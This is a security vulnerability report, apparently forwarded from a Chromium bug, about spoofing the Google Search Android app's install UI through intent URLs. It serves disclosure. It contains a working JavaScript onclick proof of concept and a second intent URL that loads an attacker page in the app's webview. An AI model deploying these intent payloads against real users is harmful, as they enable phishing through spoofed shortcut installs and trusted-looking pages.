Summary:
Web app install spoof via intent
Product:
URL:
https://play.google.com/store/apps/details?id=com.google.android.googlequicksearchbox
Vulnerability type:
Security UI Spoofing
Details
The following has been forwarded from
https://bugs.chromium.org/p/chromium/issues/detail?id=1520159
as requested by [REDACTED_EMAIL] "get me cc'd on them so I can help provide context"
On an android device run the following code on any website then click on the page.
onclick = () => {
location.href='intent://search.app.goo.gl/?link=
https://www.google.com/hsi?name%3DChrome%26icon%3Dhttps://ssl.gstatic.com/shortcuts/android/home/v1/192px/weather_g_badged.png%26ve%3D145828%26hv%3D1%26dest%3D1%26source%3Dhomescreen_shortcut%26query%3Dhttps%3A%2F%2Fndev.tk%23Intent;scheme%3Dhttps;package%3Dcom.google.android.googlequicksearchbox;end&apn=com.google.android.googlequicksearchbox#Intent;package=com.google.android.gms;scheme=https;end;'
location.href='
https://www.google.com'
;
}
Its also possible to skip the add to home screen step like this: (Sandboxed main frame escape)
intent://
www.google.com/gasearch?q=https://ndev.tk#Intent;scheme=https;package=com.google.android.googlequicksearchbox;end
A fix would need to cover both firebase (com.google.android.gms) and using the intent directly.
Attack scenario
Please see video for PoC :)
From any website:
No origin is displayed on the install prompt and the icon is chosen by the attacker, attacker controlled page is shown in a google app webview (seems to work differently then a normal page load)
The origin
https://www.google.com
was shown before a prompt was given.
It seems strange that  browser intents cant be origin scoped like stuff for google does not need to be allowed for every site, maybe that could change.
Some quotes:
"It does seem like this has spoof potential"
"The shortcut spoof is probably also low sev, but definitely something that should be fixed as I see no reason for google search app to be allowing untrusted sites to request shortcut install (even if non-malicious) on link click.
In any case, neither of these issues are fixable in Chrome (short of blocklisting google search app), and should be reported to the google search app."